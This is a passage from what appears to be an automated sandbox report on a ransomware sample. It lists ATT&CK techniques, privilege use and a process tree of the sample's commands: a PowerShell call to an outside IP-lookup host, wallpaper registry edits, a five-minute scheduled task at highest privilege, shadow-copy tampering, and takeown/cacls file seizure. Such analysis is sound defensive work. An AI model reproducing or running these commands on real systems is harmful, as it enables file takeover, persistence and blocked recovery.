File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-lib-uihandler.xml	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Mozilla Firefox\firefox.exe.sig	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\http\requests\vlm.xml	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\Microsoft Games\More Games\it-IT\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\106.0.5249.119\chrome_200_percent.pak	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\db\bin\startNetworkServer.bat	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\CET	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Luxembourg	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\SystemV\YST9	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Indiana\Petersburg	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Microsoft Games\Chess\it-IT\Chess.exe.mui	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.bindings.nl_ja_4.4.0.v20140623020002.jar	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Microsoft Games\Purble Place\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-print.jar	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Enderbury	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\db\bin\ij.bat	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT-5	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Asia\Urumqi	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\1423861240389.profile.gz	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jface.nl_zh_4.4.0.v20140623020002.jar	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Microsoft Games\Multiplayer\Backgammon\de-DE\bckgRes.dll.mui	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exe

pid process

5580 schtasks.exe
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
ransomware

File Deletion
T1070.004

Inhibit System Recovery
T1490

Processes:

vssadmin.exe

pid process

5756 vssadmin.exe
Suspicious behavior: EnumeratesProcesses 7 IoCs

Processes:

powershell.exeD22bUU4y64.exe

pid process

2640 powershell.exe
4084 D22bUU4y64.exe
4084 D22bUU4y64.exe
4084 D22bUU4y64.exe
4084 D22bUU4y64.exe
4084 D22bUU4y64.exe
4084 D22bUU4y64.exe
Suspicious behavior: LoadsDriver 1 IoCs

Processes:

D22bUU4y64.exe

pid process

4084 D22bUU4y64.exe

pid	process
5580	schtasks.exe

pid	process
5756	vssadmin.exe

pid	process
2640	powershell.exe
4084	D22bUU4y64.exe
4084	D22bUU4y64.exe
4084	D22bUU4y64.exe
4084	D22bUU4y64.exe
4084	D22bUU4y64.exe
4084	D22bUU4y64.exe

pid	process
4084	D22bUU4y64.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exeD22bUU4y64.exevssvc.exetakeown.exetakeown.exetakeown.exeWMIC.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exe

description	pid	process
Token: SeDebugPrivilege	2640	powershell.exe
Token: SeDebugPrivilege	4084	D22bUU4y64.exe
Token: SeLoadDriverPrivilege	4084	D22bUU4y64.exe
Token: SeBackupPrivilege	3216	vssvc.exe
Token: SeRestorePrivilege	3216	vssvc.exe
Token: SeAuditPrivilege	3216	vssvc.exe
Token: SeTakeOwnershipPrivilege	3016	takeown.exe
Token: SeTakeOwnershipPrivilege	5624	takeown.exe
Token: SeTakeOwnershipPrivilege	3852	takeown.exe
Token: SeIncreaseQuotaPrivilege	3792	WMIC.exe
Token: SeSecurityPrivilege	3792	WMIC.exe
Token: SeTakeOwnershipPrivilege	3792	WMIC.exe
Token: SeLoadDriverPrivilege	3792	WMIC.exe
Token: SeSystemProfilePrivilege	3792	WMIC.exe
Token: SeSystemtimePrivilege	3792	WMIC.exe
Token: SeProfSingleProcessPrivilege	3792	WMIC.exe
Token: SeIncBasePriorityPrivilege	3792	WMIC.exe
Token: SeCreatePagefilePrivilege	3792	WMIC.exe
Token: SeBackupPrivilege	3792	WMIC.exe
Token: SeRestorePrivilege	3792	WMIC.exe
Token: SeShutdownPrivilege	3792	WMIC.exe
Token: SeDebugPrivilege	3792	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3792	WMIC.exe
Token: SeRemoteShutdownPrivilege	3792	WMIC.exe
Token: SeUndockPrivilege	3792	WMIC.exe
Token: SeManageVolumePrivilege	3792	WMIC.exe
Token: 33	3792	WMIC.exe
Token: 34	3792	WMIC.exe
Token: 35	3792	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3792	WMIC.exe
Token: SeSecurityPrivilege	3792	WMIC.exe
Token: SeTakeOwnershipPrivilege	3792	WMIC.exe
Token: SeLoadDriverPrivilege	3792	WMIC.exe
Token: SeSystemProfilePrivilege	3792	WMIC.exe
Token: SeSystemtimePrivilege	3792	WMIC.exe
Token: SeProfSingleProcessPrivilege	3792	WMIC.exe
Token: SeIncBasePriorityPrivilege	3792	WMIC.exe
Token: SeCreatePagefilePrivilege	3792	WMIC.exe
Token: SeBackupPrivilege	3792	WMIC.exe
Token: SeRestorePrivilege	3792	WMIC.exe
Token: SeShutdownPrivilege	3792	WMIC.exe
Token: SeDebugPrivilege	3792	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3792	WMIC.exe
Token: SeRemoteShutdownPrivilege	3792	WMIC.exe
Token: SeUndockPrivilege	3792	WMIC.exe
Token: SeManageVolumePrivilege	3792	WMIC.exe
Token: 33	3792	WMIC.exe
Token: 34	3792	WMIC.exe
Token: 35	3792	WMIC.exe
Token: SeTakeOwnershipPrivilege	5688	takeown.exe
Token: SeTakeOwnershipPrivilege	5764	takeown.exe
Token: SeTakeOwnershipPrivilege	4772	takeown.exe
Token: SeTakeOwnershipPrivilege	4468	takeown.exe
Token: SeTakeOwnershipPrivilege	2240	takeown.exe
Token: SeTakeOwnershipPrivilege	3980	takeown.exe
Token: SeTakeOwnershipPrivilege	1564	takeown.exe
Token: SeTakeOwnershipPrivilege	5312	takeown.exe
Token: SeTakeOwnershipPrivilege	5464	takeown.exe
Token: SeTakeOwnershipPrivilege	2456	takeown.exe
Token: SeTakeOwnershipPrivilege	2400	takeown.exe
Token: SeTakeOwnershipPrivilege	5676	takeown.exe
Token: SeTakeOwnershipPrivilege	3612	takeown.exe
Token: SeTakeOwnershipPrivilege	3316	takeown.exe
Token: SeTakeOwnershipPrivilege	4104	takeown.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.execmd.execmd.execmd.execmd.execmd.exeD22bUU4y.exe

description	pid	process	target process
PID 2868 wrote to memory of 2936	2868	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe	cmd.exe
PID 2868 wrote to memory of 2936	2868	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe	cmd.exe
PID 2868 wrote to memory of 2936	2868	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe	cmd.exe
PID 2868 wrote to memory of 2936	2868	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe	cmd.exe
PID 2868 wrote to memory of 2732	2868	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe	NWiBQzcf.exe
PID 2868 wrote to memory of 2732	2868	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe	NWiBQzcf.exe
PID 2868 wrote to memory of 2732	2868	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe	NWiBQzcf.exe
PID 2868 wrote to memory of 2732	2868	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe	NWiBQzcf.exe
PID 2868 wrote to memory of 796	2868	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe	cmd.exe
PID 2868 wrote to memory of 796	2868	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe	cmd.exe
PID 2868 wrote to memory of 796	2868	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe	cmd.exe
PID 2868 wrote to memory of 796	2868	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe	cmd.exe
PID 796 wrote to memory of 2640	796	cmd.exe	powershell.exe
PID 796 wrote to memory of 2640	796	cmd.exe	powershell.exe
PID 796 wrote to memory of 2640	796	cmd.exe	powershell.exe
PID 796 wrote to memory of 2640	796	cmd.exe	powershell.exe
PID 2868 wrote to memory of 1960	2868	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe	cmd.exe
PID 2868 wrote to memory of 1960	2868	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe	cmd.exe
PID 2868 wrote to memory of 1960	2868	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe	cmd.exe
PID 2868 wrote to memory of 1960	2868	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe	cmd.exe
PID 2868 wrote to memory of 1724	2868	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe	cmd.exe
PID 2868 wrote to memory of 1724	2868	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe	cmd.exe
PID 2868 wrote to memory of 1724	2868	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe	cmd.exe
PID 2868 wrote to memory of 1724	2868	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe	cmd.exe
PID 1960 wrote to memory of 1576	1960	cmd.exe	reg.exe
PID 1960 wrote to memory of 1576	1960	cmd.exe	reg.exe
PID 1960 wrote to memory of 1576	1960	cmd.exe	reg.exe
PID 1960 wrote to memory of 1576	1960	cmd.exe	reg.exe
PID 1724 wrote to memory of 828	1724	cmd.exe	wscript.exe
PID 1724 wrote to memory of 828	1724	cmd.exe	wscript.exe
PID 1724 wrote to memory of 828	1724	cmd.exe	wscript.exe
PID 1724 wrote to memory of 828	1724	cmd.exe	wscript.exe
PID 1960 wrote to memory of 1492	1960	cmd.exe	reg.exe
PID 1960 wrote to memory of 1492	1960	cmd.exe	reg.exe
PID 1960 wrote to memory of 1492	1960	cmd.exe	reg.exe
PID 1960 wrote to memory of 1492	1960	cmd.exe	reg.exe
PID 1960 wrote to memory of 1816	1960	cmd.exe	reg.exe
PID 1960 wrote to memory of 1816	1960	cmd.exe	reg.exe
PID 1960 wrote to memory of 1816	1960	cmd.exe	reg.exe
PID 1960 wrote to memory of 1816	1960	cmd.exe	reg.exe
PID 2868 wrote to memory of 1568	2868	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe	cmd.exe
PID 2868 wrote to memory of 1568	2868	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe	cmd.exe
PID 2868 wrote to memory of 1568	2868	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe	cmd.exe
PID 2868 wrote to memory of 1568	2868	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe	cmd.exe
PID 1568 wrote to memory of 2776	1568	cmd.exe	cacls.exe
PID 1568 wrote to memory of 2776	1568	cmd.exe	cacls.exe
PID 1568 wrote to memory of 2776	1568	cmd.exe	cacls.exe
PID 1568 wrote to memory of 2776	1568	cmd.exe	cacls.exe
PID 1568 wrote to memory of 2628	1568	cmd.exe	takeown.exe
PID 1568 wrote to memory of 2628	1568	cmd.exe	takeown.exe
PID 1568 wrote to memory of 2628	1568	cmd.exe	takeown.exe
PID 1568 wrote to memory of 2628	1568	cmd.exe	takeown.exe
PID 1568 wrote to memory of 3912	1568	cmd.exe	cmd.exe
PID 1568 wrote to memory of 3912	1568	cmd.exe	cmd.exe
PID 1568 wrote to memory of 3912	1568	cmd.exe	cmd.exe
PID 1568 wrote to memory of 3912	1568	cmd.exe	cmd.exe
PID 3912 wrote to memory of 3936	3912	cmd.exe	D22bUU4y.exe
PID 3912 wrote to memory of 3936	3912	cmd.exe	D22bUU4y.exe
PID 3912 wrote to memory of 3936	3912	cmd.exe	D22bUU4y.exe
PID 3912 wrote to memory of 3936	3912	cmd.exe	D22bUU4y.exe
PID 3936 wrote to memory of 4084	3936	D22bUU4y.exe	D22bUU4y64.exe
PID 3936 wrote to memory of 4084	3936	D22bUU4y.exe	D22bUU4y64.exe
PID 3936 wrote to memory of 4084	3936	D22bUU4y.exe	D22bUU4y64.exe
PID 3936 wrote to memory of 4084	3936	D22bUU4y.exe	D22bUU4y64.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
"C:\Users\Admin\AppData\Local\Temp\FoxRansomware\941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe"
1⤵
- Matrix Ransomware
- Loads dropped DLL
- Drops desktop.ini file(s)
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:2868
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C copy /V /Y "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe" "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWiBQzcf.exe"
  2⤵
  PID:2936
- C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWiBQzcf.exe
  "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWiBQzcf.exe" -n
  2⤵
  - Executes dropped EXE
  PID:2732
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')">"C:\Users\Admin\AppData\Local\Temp\FoxRansomware\2AtfLWqd.txt"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:796
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')"
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2640
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\Mf8QLzo3.bmp" /f & reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f & reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1960
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\Mf8QLzo3.bmp" /f
    3⤵
    - Sets desktop wallpaper using registry
    PID:1576
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f
    3⤵
    PID:1492
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
    3⤵
    - Matrix Ransomware
    PID:1816
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\jGLSZ8VD.vbs"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1724
- - C:\Windows\SysWOW64\wscript.exe
    wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\jGLSZ8VD.vbs"
    3⤵
    PID:828
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\jBIuzzaK.bat" /sc minute /mo 5 /RL HIGHEST /F
      4⤵
      PID:752
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\jBIuzzaK.bat" /sc minute /mo 5 /RL HIGHEST /F
        5⤵
        Creates scheduled task(s)
        
        PID:5580
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C schtasks /Run /I /tn DSHCA
      4⤵
      PID:3164
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /Run /I /tn DSHCA
        5⤵
        
        PID:4708
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1568
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf" /E /G Admin:F /C
    3⤵
    PID:2776
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf"
    3⤵
    PID:2628
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "SignHere.pdf" -nobanner
    3⤵
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:3912
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
      D22bUU4y.exe -accepteula "SignHere.pdf" -nobanner
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of WriteProcessMemory
      PID:3936
    - - C:\Users\Admin\AppData\Local\Temp\D22bUU4y64.exe
        
        D22bUU4y.exe -accepteula "SignHere.pdf" -nobanner
        5⤵
        Drops file in Drivers directory
        Sets service image path in registry
        Executes dropped EXE
        Enumerates connected drives
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: LoadsDriver
        Suspicious use of AdjustPrivilegeToken
        
        PID:4084
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf""
  2⤵
  - Loads dropped DLL
  PID:2708
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf" /E /G Admin:F /C
    3⤵
    PID:4424
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf"
    3⤵
    PID:3688
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "StandardBusiness.pdf" -nobanner
    3⤵
    - Loads dropped DLL
    PID:4236
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
      D22bUU4y.exe -accepteula "StandardBusiness.pdf" -nobanner
      4⤵
      Executes dropped EXE
      PID:2132
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
    D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:4404
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf""
  2⤵
  - Loads dropped DLL
  PID:5736
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf" /E /G Admin:F /C
    3⤵
    PID:1068
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf"
    3⤵
    - Modifies file permissions
    PID:2364
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "ENUtxt.pdf" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1936
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
      D22bUU4y.exe -accepteula "ENUtxt.pdf" -nobanner
      4⤵
      Executes dropped EXE
      PID:3032
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
    D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:5136
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\PDFSigQFormalRep.pdf""
  2⤵
  - Loads dropped DLL
  PID:5172
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\PDFSigQFormalRep.pdf" /E /G Admin:F /C
    3⤵
    PID:5200
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\PDFSigQFormalRep.pdf"
    3⤵
    PID:5220
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "PDFSigQFormalRep.pdf" -nobanner
    3⤵
    - Loads dropped DLL
    PID:936
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
      D22bUU4y.exe -accepteula "PDFSigQFormalRep.pdf" -nobanner
      4⤵
      Executes dropped EXE
      PID:2168
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
    D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:3672
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf""
  2⤵
  - Loads dropped DLL
  PID:556
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf" /E /G Admin:F /C
    3⤵
    PID:5292
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf"
    3⤵
    PID:5312
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "Dynamic.pdf" -nobanner
    3⤵
    - Loads dropped DLL
    PID:5340
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
      D22bUU4y.exe -accepteula "Dynamic.pdf" -nobanner
      4⤵
      Executes dropped EXE
      PID:5348
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
    D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:5384
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf""
  2⤵
  - Loads dropped DLL
  PID:4312
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf" /E /G Admin:F /C
    3⤵
    PID:5484
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf"
    3⤵
    - Modifies file permissions
    PID:5480
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "DefaultID.pdf" -nobanner
    3⤵
    - Loads dropped DLL
    PID:5448
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
      D22bUU4y.exe -accepteula "DefaultID.pdf" -nobanner
      4⤵
      Executes dropped EXE
      PID:5492
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
    D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:5512
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\classes.jsa""
  2⤵
  - Loads dropped DLL
  PID:5544
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\classes.jsa" /E /G Admin:F /C
    3⤵
    PID:2456
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\classes.jsa"
    3⤵
    - Modifies file permissions
    PID:1068
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "classes.jsa" -nobanner
    3⤵
    - Loads dropped DLL
    PID:2364
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
      D22bUU4y.exe -accepteula "classes.jsa" -nobanner
      4⤵
      Executes dropped EXE
      PID:2952
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
    D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1720
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf""
  2⤵
  - Loads dropped DLL
  PID:5136
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf" /E /G Admin:F /C
    3⤵
    PID:5160
